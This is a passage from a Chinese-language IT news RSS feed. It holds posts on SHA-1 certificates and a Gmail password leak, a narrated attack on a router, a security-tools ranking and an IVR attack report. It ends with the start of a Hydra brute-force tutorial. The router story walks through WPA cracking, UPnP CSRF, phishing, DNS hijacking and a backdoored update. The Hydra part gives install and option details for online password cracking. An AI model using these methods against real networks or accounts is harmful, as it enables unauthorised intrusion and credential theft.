title="http://sha1affected.com/"&gt;http://sha1affected.com/&lt;/a&gt;），輸入網址就幫你分析憑證狀況並預估在各版Chrome下的顯示狀態，對網站SSL憑證有疑慮的朋友可多加利用。&lt;/p&gt;   &lt;p&gt;因此，若網站現有憑證到期日在2016/1/1以後，Chrome 40/41使用者用HTTPS連上網站時，將出現鎖頭加黃三角或鎖頭加紅叉叉的狀況。網站管理者可請CA廠商或組織重新簽發SHA256版本，一般不會收費，但得花功夫處理，基於避免使用者誤解的立場，更換掉還是比較好。&lt;/p&gt;   &lt;p&gt;不得不說，Google這一招對於撲殺SHA1憑證很有效果。雖然此舉為部分網站管理者多添一椿麻煩事，從提升全球資安的角度來看，還是要為Google按個讚！&lt;/p&gt;   &lt;p&gt;  &lt;strong&gt;【延伸閱讀】&lt;/strong&gt;&lt;/p&gt;   &lt;ul&gt;     &lt;li&gt;   &lt;a href="https://community.qualys.com/blogs/securitylabs/2014/09/09/sha1-deprecation-what-you-need-to-know" title="Security Labs- SHA1 Deprecation- What You Need ... - Qualys Community"&gt;Security Labs- SHA1 Deprecation- What You Need ... - Qualys Community&lt;/a&gt; 淺顯完整的SHA1議題說明&lt;/li&gt;      &lt;li&gt;   &lt;a href="http://blogs.technet.com/b/pki/archive/2013/11/12/sha1-deprecation-policy.aspx" title="SHA1 Deprecation Policy - Windows PKI blog - Site Home - TechNet Blogs"&gt;SHA1 Deprecation Policy - Windows PKI blog - TechNet Blogs&lt;/a&gt; 微軟的SHA1停用政策&lt;/li&gt;      &lt;li&gt;   &lt;a href="http://googleonlinesecurity.blogspot.co.uk/2014/09/gradually-sunsetting-sha-1.html" title="Google Online Security Blog- Gradually sunsetting SHA-1"&gt;Google Online Security Blog- Gradually sunsetting SHA-1&lt;/a&gt; Google的Chrome SHA1停用政策&lt;/li&gt; &lt;/ul&gt; &lt;img height="1" src="http://blog.darkthread.net/aggbug.aspx?PostID=11655" width="1"&gt;&lt;/img&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Security</category>
      <guid isPermaLink="true">https://itindex.net/detail/53244-https-chrome</guid>
      <pubDate>Thu, 23 Apr 2015 21:22:03 CST</pubDate>
    </item>
    <item>
      <title>關於Gmail五百萬筆密碼洩漏傳聞與資安提醒</title>
      <link>https://itindex.net/detail/51017-gmail</link>
      <description>&lt;p&gt;在網路上看到 Gmail 密碼外洩消息，我「震驚」了…由於與個人資安切身相關，當然要深入了解，便找了資料來讀，順便整理分享。&lt;/p&gt;   &lt;p&gt;本週二，有人在俄羅斯 Bitcom 論壇貼了一份 493 萬筆 Gmail 帳號密碼清單，被俄羅斯媒體 CNews 報導後，隨即在網路「瘋傳」（咳… 可以不要玩這些哏了嗎？）。論壇管理者事後移除清單裡的密碼，只留下帳號，而貼出清單的原PO則再跑出來聲稱其中 60％ 的密碼是有效的。&lt;/p&gt;   &lt;p&gt;初步分析帳號名稱，主要來自英國、西班牙及俄羅斯，且看起來是長時間蒐集所得，部分帳號已改過密碼或停用。依 Google 的看法，並沒有證據顯示 Gmail 系統出現漏洞導致密碼被竊，而目前大家也較認同洩漏源自「密碼共用」。猜測為使用者在其他網站註冊會員時使用 Gmail 作為登入ID，同時又將密碼設定與 Gmail 相同，一旦該網站被駭或作業疏失造成帳號密碼外洩，就等同 Gmail 帳號密碼流入他人之手。&lt;/p&gt;   &lt;p&gt;網路媒體 Mashable 則有更明確的資訊。依據資安專家 Matteo Flora 檢測：清單有 60 位他認識的人，經連繫，其中 30 位指出清單上的密碼從未用在 Gmail 或是年代久遠。另外，陸續有很多位名列清單的使用者證實，清單所指的密碼從未用於Gmail。由此推論，清單來自其他網站會員資料庫的可能性頗高。&lt;/p&gt;   &lt;p&gt;有人寫了網站服務可以檢查自己的帳號是否在洩漏清單中，但提供者身分不明，要當心輸入的 Email 被拿來發垃圾信。（另外，如果將來出現網站要你輸入 Gmail 帳號密碼檢查有沒有外洩，千萬別 Key 呀！）如果有疑慮，建議馬上改密碼，這是絕無副作用的自保之道。&lt;/p&gt;   &lt;p&gt;個人結論如下：&lt;/p&gt;   &lt;ol&gt;     &lt;li&gt;此次所謂 500 萬筆 Gmail 密碼，蒐集自其他網站註冊資料的可能情極高，應非 Gmail 服務出現資安漏洞，不需驚慌，若有疑慮，就把密碼換掉吧！Z &amp;gt; B。 &lt;/li&gt;      &lt;li&gt;不要共用密碼！不要共用密碼！不要共用密碼！很重要，所以說三次。         &lt;br /&gt;每個網站的安全防護強度不一，全部共用同一組密碼，代表任一網站被破，所有網站身分的安全性都亮紅燈。擔心密碼太多記不住？請愛用   &lt;a href="http://www.playpcesor.com/2008/02/keepass-password-safe.html"&gt;KeyPass&lt;/a&gt;。 &lt;/li&gt;      &lt;li&gt;請善用「兩步驟驗證」，   &lt;a href="http://www.playpcesor.com/2011/07/google_29.html"&gt;Gmail&lt;/a&gt; 與    &lt;a href="http://www.playpcesor.com/2013/04/microsoft-skype.html"&gt;Hotmail&lt;/a&gt; 都已支援。既然電子郵件已是網路身分的重要依據，裡面又擺滿個資，沒理由不讓它更安全一點。啟用兩步驟驗證後，要用陌生機器登入，就需要簡訊認證，如此歹徒就算拿到密碼，沒有你的手機也無法登入。 &lt;/li&gt;      &lt;li&gt;遇到有好心網站要你提供 Email、帳號及密碼說要幫你尋找朋友、檢查帳號安全，輸入前請張大眼睛，當心被騙。 &lt;/li&gt; &lt;/ol&gt;   &lt;p&gt;【參考資料】&lt;/p&gt;   &lt;ul&gt;     &lt;li&gt;   &lt;a href="http://thenextweb.com/google/2014/09/10/4-93-million-gmail-usernames-passwords-published-google-says-evidence-systems-compromised/" title="5 Million Gmail Passwords Leak, Google Says No Compromise"&gt;5 Million Gmail Passwords Leak, Google Says No Compromise&lt;/a&gt; &lt;/li&gt;      &lt;li&gt;   &lt;a href="http://mashable.com/2014/09/10/5-million-gmail-passwords-leak/" title="A List of 5 Million 'Gmail Passwords' Leaked, But There's No Need to Panic"&gt;A List of 5 Million &amp;apos;Gmail Passwords&amp;apos; Leaked, But There&amp;apos;s No Need to Panic&lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;img height="1" src="http://blog.darkthread.net/aggbug.aspx?PostID=11255" width="1"&gt;&lt;/img&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Security</category>
      <guid isPermaLink="true">https://itindex.net/detail/51017-gmail</guid>
      <pubDate>Thu, 11 Sep 2014 06:30:49 CST</pubDate>
    </item>
    <item>
      <title>看我如何黑掉你的路由器</title>
      <link>https://itindex.net/detail/49752-%E8%B7%AF%E7%94%B1%E5%99%A8</link>
      <description>&lt;p&gt;  &lt;a href="http://www.geekfan.net/wp-content/uploads/93b2ef56456f5a450aed1a98a61b51fd.jpg" rel="lightbox[9391]" title="&amp;#30475;&amp;#25105;&amp;#22914;&amp;#20309;&amp;#40657;&amp;#25481;&amp;#20320;&amp;#30340;&amp;#36335;&amp;#30001;&amp;#22120;"&gt;   &lt;img alt="21840d75d420688f3d5c91e46035f681" height="209" src="http://www.geekfan.net/wp-content/uploads/93b2ef56456f5a450aed1a98a61b51fd.jpg" width="396"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;前段时间我一个在信息安全领域的朋友让我干一件很奇怪的事情.他让我入侵他.为了保持匿名,就让我们叫他比尔吧.无辜的人名和地名也都已经匿名.供应商的名字依然保留以便追究责任.&lt;/p&gt;
 &lt;p&gt;入侵大公司很容易.他们拥有的信息资产跨越全球,并且不太注重对各种各样的防护技术的投入.跟踪所有资料实在有难度.它要求对组织内所有资产有禅宗般每天严格遵守”扫描-打补丁-重复”的原则,不能有一点闪失 .&lt;/p&gt;
 &lt;p&gt;针对个人的入侵则是很恼人的.黑帽子确实在关于信息安全上有不对称优势.有时候只要有一个漏洞就足够了.但是针对个人的攻击面相对于一个公司而言是相当小的.此外大多数人信任大提供商和他们的信息也相信云提供商会有有效措施来保护人们.&lt;/p&gt;
 &lt;p&gt;我要从最基本的侦查工作开始.我比较喜欢Maltego.Meltego就像是checkusernames.com, knowem.com, pipl search这些网络搜索工具或者其他的在线搜索工具.还有经典的google+,Facebook和Linkedin.Meltego可以在你做这些事情的时候帮助你在Facebook伪造身份.一个好的伪身份可以迷惑你的目标.在你利用社会化搜索引擎提取信息的时候它可以帮到你的.&lt;/p&gt;
 &lt;p&gt;关于线上资源,密码重置问题往往是最容易搞定的.我见到有的邮箱账号的重置问题就是目标人的人人网个人信息.我敢打包票大多数人从来没意识到这其中的联系.因为可能他们是5年前设置的这些密码重置问题.当然了这些东西对于我当前的情况是不适用的.我的目标曾经是个信息安全专家而且而且知道我要来.&lt;/p&gt;
 &lt;p&gt;这场战斗是需要点时间的.首先我要检查一下他有没有在家庭网络连接什么东西.他可能在不知道的情况下已经连上了什么东西.很多应用和设备开启了UPnP服务,但是只有用户级别的防火墙而且没有明确声明,这就给了我可乘之机.有时候攻击成功所需要的仅仅是一个网络存储器或者是媒体服务器,一个后门即可. 要找到他家的IP地址,我需要一个skype解析器,比如resolveme.org. 真的非常好用.我扫描了他的IP和他邻近的几个IP,看看能不能发现什么设备.当然一无所获…他肯定知道我会这么做的.&lt;/p&gt;
 &lt;p&gt;下一步,无线协议.无线网络是一个非常不错的攻击媒介.我用两台设备都是i7CPU 瑞昱6900用来破解WPA散列.我用马尔科夫的单词预测生成器作为oclHashcat的散列种子.它在八小时内平均有百分之八十的破解率.&lt;/p&gt;
 &lt;p&gt;于是我立即着手把比尔的地址分配给几个无线网卡.当前情况下我实际上是知道比尔的地址的,我其实也可以从通过侦查或者是社会工程学得到.严格意义上这个不算是秘密.成功捕获到WPA握手我就开始运行破解器,一个星期之后仍然一无所获.这个方法对于大多数人是有效的,但是比尔是一个信息安全专家.他的WPA密码长度可能大于32个字符.&lt;/p&gt;
 &lt;p&gt;到了这时候你或许会奇怪为什么我不直接用一个未公开漏洞一举拿下他呢.答案很简单-我了解我的攻击目标.他深得软件安全的精髓:”扫描-打补丁-重复”.甚至都没装Java.但是如果我确实手里有一个浏览器的未公开漏洞.我应该会在最后一个星期用的来赢得这个比赛.&lt;/p&gt;
 &lt;p&gt;我去了一趟比尔家里之后我确实得到了一些有用的信息,我得到了他路由器的无线MAC地址:06:A1:51:E3:15:E3.因为我有了OUI(组织唯一标识符).我可以知道这是一个网件公司的路由器,他们家的路由器之前确实是有一些漏洞的,但是比尔的那个跑的是最新的固件.不过最新的固件也并不意味着所有的漏洞都打了补丁了.唯一的办法就是买一个一样的网件路由器回来我自己测试.&lt;/p&gt;
 &lt;p&gt;知道具体买哪种型号不太可能(至少远程不行).消费者手中不同型号的设备之间有很大差异,比如片上系统来自Broadcom还是Atheros.我知道比尔还是比较节俭的.所以我买的是入门级设备WNDR3400v3.&lt;/p&gt;
 &lt;p&gt;看了一下之前这个设备有的一些漏洞之后我写了两个测试模块,第一个模块里用的是  &lt;a href="https://gist.github.com/phikshun/9632445" target="_blank" title="Netgear UPnP CSRF Module"&gt;CSRF bug to POST to the UPnP interface&lt;/a&gt; 而且还开了一个远程登陆路由器的后门.不少设备都有这个漏洞,值得尝试.&lt;/p&gt;
 &lt;p&gt;如果你能通过CSRF欺骗UPnP请求,那么你就能把整个网络翻个底朝天.&lt;/p&gt;
 &lt;p&gt;  &lt;a href="http://www.geekfan.net/wp-content/uploads/2b739a341704d67c18c27385b3837b22.jpg" rel="lightbox[9391]" title="&amp;#30475;&amp;#25105;&amp;#22914;&amp;#20309;&amp;#40657;&amp;#25481;&amp;#20320;&amp;#30340;&amp;#36335;&amp;#30001;&amp;#22120;"&gt;   &lt;img alt="83ec526f17bbdabef955fd71b209e4be" height="443" src="http://www.geekfan.net/wp-content/uploads/2b739a341704d67c18c27385b3837b22.jpg" width="591"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;还有更重要的一点,我想要做的是打开一个端口. 然后可以通过被攻击者的浏览器用Ajax请求配置子网里面每一个IP的NAT设置,迅速禁用防火墙.当然,UPnP NAT条目的数量是有限制的,但是大多数设备还是有足够的条目允许给大约一百个主机设置关键端口的.&lt;/p&gt;
 &lt;p&gt;为了引诱比尔掉入我的陷阱,我给他发送了一封嵌入链接的电子邮件.  &lt;a href="http://www.advancedpentest.com/" target="_blank" title="Cobalt Strike"&gt;Cobalt Strike&lt;/a&gt; 有一个工具可以拷贝已有的电子邮件(包括邮件头部和正文),基本上是整套的工具.所有你需要做的只是改一下链接.那么什么邮件是所有人即使是一个信息安全专家都会点击的呢? Linkedin 邀请.&lt;/p&gt;
 &lt;p&gt;编者的话:有些读者可能会有所怀疑,为什比尔会栽在这上面呢.即使是粗略的检查一下发送者的主机名和链接就彻底暴露了.这场角逐的关键点在于托词.关于托词的背景知识请参考  &lt;a href="https://www.trustedsec.com/march-2014/pretexting-like-boss/"&gt;这篇文章&lt;/a&gt;. 那天下午他刚刚见过本案例中的邀请发起人.而且这个会面是一个非正式的工作面试.我假定了这么一个情况:他想确认他已经得到这个工作.&lt;/p&gt;
 &lt;p&gt;在我发送这封邮件之前我需要跟踪我的攻击效果.默认情况下网件路由器的远程登录接口会打开但是服务是无应答的.你必须连接上这个端口并且发送特定的解锁密钥.这个确实已经有了公开密钥可用,但是我实在太喜欢Ruby了所以我还是自己写了另外一个  &lt;a href="https://gist.github.com/phikshun/9632525"&gt;MSF模块&lt;/a&gt;,&lt;/p&gt;
 &lt;p&gt;比尔点击了这个链接,我一看到应答就立即启动了第二个模块并且远程登录了路由器,获得最高权限之后我就立即将路由器的DNS设置成了我自己控制的一个DNS服务器.&lt;/p&gt;
 &lt;p&gt;控制DNS服务器是非常有用的.DNS可以快速提供”可定制的”&amp;quot;中间人”.众多的中间人攻击工具里面我最喜欢的还是可藏匿行踪的  &lt;a href="http://www.infobyte.com.ar/developments.html" target="_blank" title="Evilgrade"&gt;Evilgrade&lt;/a&gt; .Evilgrade已经多年无更新了但是依然很好用(一些修改是必须的了).一个星期之后比尔决定升级他的notepad++.他实际上获得的notepad++新版本是有一个后门的,一个Meterpreter shell就会自动安装.我马上给他发了一封邮件,里面是一些截图和击键记录.几分钟后他断开了他的电脑.&lt;/p&gt;
 &lt;p&gt;作为对我所取得成就的奖励:六瓶装的啤酒,真是爱死Ruby了.&lt;/p&gt;

 &lt;div&gt;  &lt;div&gt;   &lt;h3&gt;相关文章&lt;/h3&gt;   &lt;ul&gt;    &lt;li&gt;     &lt;a href="http://www.geekfan.net/1451/"&gt;敢偷用我的WiFi？ 看我怎么治你&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="http://www.geekfan.net/5827/"&gt;如何解决无线路由器的故障问题&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="http://www.geekfan.net/4920/"&gt;你的电脑在偷偷连接什么网站？&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="http://www.geekfan.net/4410/"&gt;网站是如何跟踪监视你的&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="http://www.geekfan.net/8895/"&gt;流量劫持是如何产生的？&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="http://www.geekfan.net/8985/"&gt;流量劫持能有多大危害？&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="http://www.geekfan.net/7064/"&gt;用Linux命令行生成随机密码的十种方法&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="http://www.geekfan.net/2344/"&gt;OpenWrt——适用于路由器的Linux系统&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="http://www.geekfan.net/7441/"&gt;玩转路由器，交叉编译Python 3.3&lt;/a&gt;&lt;/li&gt;    &lt;li&gt;     &lt;a href="http://www.geekfan.net/1512/"&gt;通过Backtrack Linux 来加强你的安全防御&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;
 &lt;p&gt;  &lt;a href="http://www.geekfan.net/9391/"&gt;看我如何黑掉你的路由器&lt;/a&gt;，首发于  &lt;a href="http://www.geekfan.net"&gt;极客范 - GeekFan.net&lt;/a&gt;。&lt;/p&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>网络安全 Hack network security router 入侵</category>
      <guid isPermaLink="true">https://itindex.net/detail/49752-%E8%B7%AF%E7%94%B1%E5%99%A8</guid>
      <pubDate>Mon, 26 May 2014 11:53:58 CST</pubDate>
    </item>
    <item>
      <title>SecTools 2011年的Top125款网络安全工具排行榜</title>
      <link>https://itindex.net/detail/40850-sectools-top125-%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8</link>
      <description>&lt;p&gt;  &lt;strong&gt;PS：美帝知名网络安全网站SecTools在2011年年底对目前最流行的网络安全工具做了排名，这些工具里有部分也是我本人常用的，有开源的也有商业的。记录一下，备忘。&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;前10名如下：&lt;/p&gt;
 &lt;h2&gt;1、  &lt;a href="http://sectools.org/tool/wireshark/" rel="nofollow" target="_blank"&gt;Wireshark&lt;/a&gt; (#1,   &lt;img alt="" src="http://sectools.org/flags/uparrow.gif"&gt;&lt;/img&gt;1)&lt;/h2&gt;
 &lt;h2&gt;2、  &lt;a href="http://sectools.org/tool/metasploit/" rel="nofollow" target="_blank"&gt;Metasploit&lt;/a&gt; (#2,   &lt;img alt="" src="http://sectools.org/flags/uparrow.gif"&gt;&lt;/img&gt;3)&lt;/h2&gt;
 &lt;h2&gt;3、  &lt;a href="http://sectools.org/tool/nessus/" rel="nofollow" target="_blank"&gt;Nessus&lt;/a&gt; (#3,   &lt;img alt="" src="http://sectools.org/flags/downarrow.gif"&gt;&lt;/img&gt;2)&lt;/h2&gt;
 &lt;h2&gt;4、  &lt;a href="http://sectools.org/tool/aircrack/" rel="nofollow" target="_blank"&gt;Aircrack&lt;/a&gt; (#4,   &lt;img alt="" src="http://sectools.org/flags/uparrow.gif"&gt;&lt;/img&gt;17)&lt;/h2&gt;
 &lt;h2&gt;5、  &lt;a href="http://sectools.org/tool/snort/" rel="nofollow" target="_blank"&gt;Snort&lt;/a&gt; (#5,   &lt;img alt="" src="http://sectools.org/flags/downarrow.gif"&gt;&lt;/img&gt;2)&lt;/h2&gt;
 &lt;h2&gt;6、  &lt;a href="http://sectools.org/tool/cain/" rel="nofollow" target="_blank"&gt;Cain and Abel&lt;/a&gt; (#6,   &lt;img alt="" src="http://sectools.org/flags/uparrow.gif"&gt;&lt;/img&gt;3)&lt;/h2&gt;
 &lt;h2&gt;7、  &lt;a href="http://sectools.org/tool/backtrack/" rel="nofollow" target="_blank"&gt;BackTrack&lt;/a&gt; (#7,   &lt;img alt="" src="http://sectools.org/flags/uparrow.gif"&gt;&lt;/img&gt;25)&lt;/h2&gt;
 &lt;h2&gt;8、  &lt;a href="http://sectools.org/tool/netcat/" rel="nofollow" target="_blank"&gt;Netcat&lt;/a&gt; (#8,   &lt;img alt="" src="http://sectools.org/flags/downarrow.gif"&gt;&lt;/img&gt;4)&lt;/h2&gt;
 &lt;h2&gt;9、  &lt;a href="http://sectools.org/tool/tcpdump/" rel="nofollow" target="_blank"&gt;tcpdump&lt;/a&gt; (#9,   &lt;img alt="" src="http://sectools.org/flags/downarrow.gif"&gt;&lt;/img&gt;1)&lt;/h2&gt;
 &lt;h2&gt;10、  &lt;a href="http://sectools.org/tool/john/" rel="nofollow" target="_blank"&gt;John the Ripper&lt;/a&gt; (#10, unchanged)&lt;/h2&gt;
 &lt;p&gt;  &lt;a href="http://www.ha97.com/wp-content/uploads/2012/11/sectools-top3.jpg"&gt;   &lt;img alt="" height="747" src="http://www.ha97.com/wp-content/uploads/2012/11/sectools-top3.jpg" title="sectools-top3" width="863"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;详细榜单请看：（本人没空翻译了，英文不好的童鞋查查翻译工具。）&lt;/p&gt;
 &lt;p&gt;  &lt;a href="http://sectools.org/" rel="nofollow" target="_blank"&gt;http://sectools.org/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;附其他安全工具榜单：&lt;/p&gt;
 &lt;p&gt;http://www.cyberwarzone.com/cyberwarfare/cyber-security-tools-list-2012&lt;/p&gt;
 &lt;p&gt;http://myparticularutterance.com/2012/09/101-free-admin-tools/&lt;/p&gt;
&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Linux Security Tools UNIX 个人日记</category>
      <guid isPermaLink="true">https://itindex.net/detail/40850-sectools-top125-%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8</guid>
      <pubDate>Wed, 28 Nov 2012 14:40:20 CST</pubDate>
    </item>
    <item>
      <title>语音命令崩溃银行电话线</title>
      <link>https://itindex.net/detail/39741-%E8%AF%AD%E9%9F%B3-%E5%91%BD%E4%BB%A4-%E9%93%B6%E8%A1%8C</link>
      <description>一位安全研究员演示通过按键和语音命令攻击交互式话音响应系统（IVR），成功关闭电话系统的按键音和语音激活，甚至诱使其公开敏感信息。在测试中，一家匿名印度银行的电话系统披露了客户的PIN码。研究人员称，SQL盲注攻击和缓冲溢出攻击可适用于几乎任何IVR系统，没有银行或企业组织测试过IVR系统，它们以为它是安全的，但事实上它并不安全，没有防火墙或验证码监视语音流量。攻击针对的是双音多频信号算法，它能将用户指令转换成操作，如从数据库中提取出客户银行记录。数据库的弱点可被电话发出的语音指令利用，如导致其缓冲溢出。 &lt;img border="0" height="1" src="http://solidot.org.feedsportal.com/c/33236/f/556826/s/23824ef3/mf.gif" width="1"&gt;&lt;/img&gt; &lt;div&gt;  &lt;table border="0"&gt;   &lt;tr&gt;    &lt;td valign="middle"&gt;     &lt;a href="http://share.feedsportal.com/viral/sendEmail.cfm?lang=en&amp;title=%E8%AF%AD%E9%9F%B3%E5%91%BD%E4%BB%A4%E5%B4%A9%E6%BA%83%E9%93%B6%E8%A1%8C%E7%94%B5%E8%AF%9D%E7%BA%BF&amp;link=http%3A%2F%2Fit.solidot.org%2Farticle.pl%3Fsid%3D12%2F09%2F17%2F1021215%26amp%3Bfrom%3Drss" target="_blank"&gt;      &lt;img border="0" src="http://res3.feedsportal.com/images/emailthis2.gif"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/td&gt;    &lt;td valign="middle"&gt;     &lt;a href="http://res.feedsportal.com/viral/bookmark.cfm?title=%E8%AF%AD%E9%9F%B3%E5%91%BD%E4%BB%A4%E5%B4%A9%E6%BA%83%E9%93%B6%E8%A1%8C%E7%94%B5%E8%AF%9D%E7%BA%BF&amp;link=http%3A%2F%2Fit.solidot.org%2Farticle.pl%3Fsid%3D12%2F09%2F17%2F1021215%26amp%3Bfrom%3Drss" target="_blank"&gt;      &lt;img border="0" src="http://res3.feedsportal.com/images/bookmark.gif"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt; &lt;br /&gt; &lt;br /&gt; &lt;a href="http://da.feedsportal.com/r/144552857093/u/49/f/556826/c/33236/s/23824ef3/a2.htm"&gt;  &lt;img border="0" src="http://da.feedsportal.com/r/144552857093/u/49/f/556826/c/33236/s/23824ef3/a2.img"&gt;&lt;/img&gt;&lt;/a&gt; &lt;img border="0" height="1" src="http://pi.feedsportal.com/r/144552857093/u/49/f/556826/c/33236/s/23824ef3/a2t.img" width="1"&gt;&lt;/img&gt; &lt;div&gt;
  &lt;a href="http://feeds.feedburner.com/~ff/solidot?a=KU5sQUGN9qI:g1J6r5_1ZHU:yIl2AUoC8zA"&gt;   &lt;img border="0" src="http://feeds.feedburner.com/~ff/solidot?d=yIl2AUoC8zA"&gt;&lt;/img&gt;&lt;/a&gt;   &lt;a href="http://feeds.feedburner.com/~ff/solidot?a=KU5sQUGN9qI:g1J6r5_1ZHU:7Q72WNTAKBA"&gt;   &lt;img border="0" src="http://feeds.feedburner.com/~ff/solidot?d=7Q72WNTAKBA"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>security</category>
      <guid isPermaLink="true">https://itindex.net/detail/39741-%E8%AF%AD%E9%9F%B3-%E5%91%BD%E4%BB%A4-%E9%93%B6%E8%A1%8C</guid>
      <pubDate>Mon, 17 Sep 2012 18:20:00 CST</pubDate>
    </item>
    <item>
      <title>（总结）Linux下的暴力密码在线破解工具Hydra详解</title>
      <link>https://itindex.net/detail/40950-linux-%E6%9A%B4%E5%8A%9B-%E5%AF%86%E7%A0%81</link>
      <description>&lt;p&gt;PS：这款暴力密码破解工具相当强大，支持几乎所有协议的在线密码破解，其密码能否被破解关键在于字典是否足够强大。对于社会工程型渗透来说，有时能够得到事半功倍的效果。本文仅从安全角度去探讨测试，使用本文内容去做破坏者，与本人无关。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;一、简介&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;hydra是著名黑客组织thc的一款开源的暴力密码破解工具，可以在线破解多种密码。&lt;/strong&gt;官网：http://www.thc.org/thc-hydra，可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;二、安装&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;如果是Debian和Ubuntu发行版，源里自带hydra，直接用apt-get在线安装：  &lt;br /&gt;
  &lt;code&gt;sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;Redhat/Fedora发行版的下载源码包编译安装，先安装相关依赖包：  &lt;br /&gt;
  &lt;code&gt;yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel&lt;/code&gt;  &lt;br /&gt;
  &lt;br /&gt;
hydra下载地址：http://www.thc.org/releases/hydra-7.3.tar.gz  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
# tar zxvf hydra-7.0-src.tar.gz   &lt;br /&gt;
# cd hydra-7.0-src   &lt;br /&gt;
# ./configure   &lt;br /&gt;
# make   &lt;br /&gt;
# make install   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
hydra支持GUI图形界面，不过习惯还是命令好用。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;三、参数说明&lt;/strong&gt;  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]   &lt;br /&gt;
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]   &lt;br /&gt;
-R 继续从上一次进度接着破解。   &lt;br /&gt;
-S 采用SSL链接。   &lt;br /&gt;
-s PORT 可通过这个参数指定非默认端口。   &lt;br /&gt;
-l LOGIN 指定破解的用户，对特定用户破解。   &lt;br /&gt;
-L FILE 指定用户名字典。   &lt;br /&gt;
-p PASS 小写，指定密码破解，少用，一般是采用密码字典。   &lt;br /&gt;
-P FILE 大写，指定密码字典。   &lt;br /&gt;
-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。   &lt;br /&gt;
-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。   &lt;br /&gt;
-M FILE 指定目标列表文件一行一条。   &lt;br /&gt;
-o FILE 指定结果输出文件。   &lt;br /&gt;
-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。   &lt;br /&gt;
-t TASKS 同时运行的线程数，默认为16。   &lt;br /&gt;
-w TIME 设置最大超时的时间，单位秒，默认是30s。   &lt;br /&gt;
-v / -V 显示详细过程。   &lt;br /&gt;
server 目标ip   &lt;br /&gt;
service 指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。   &lt;br /&gt;
OPT 可选项   &lt;br /&gt;
&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;四、各种用法实例&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;简单演示：  &lt;br /&gt;
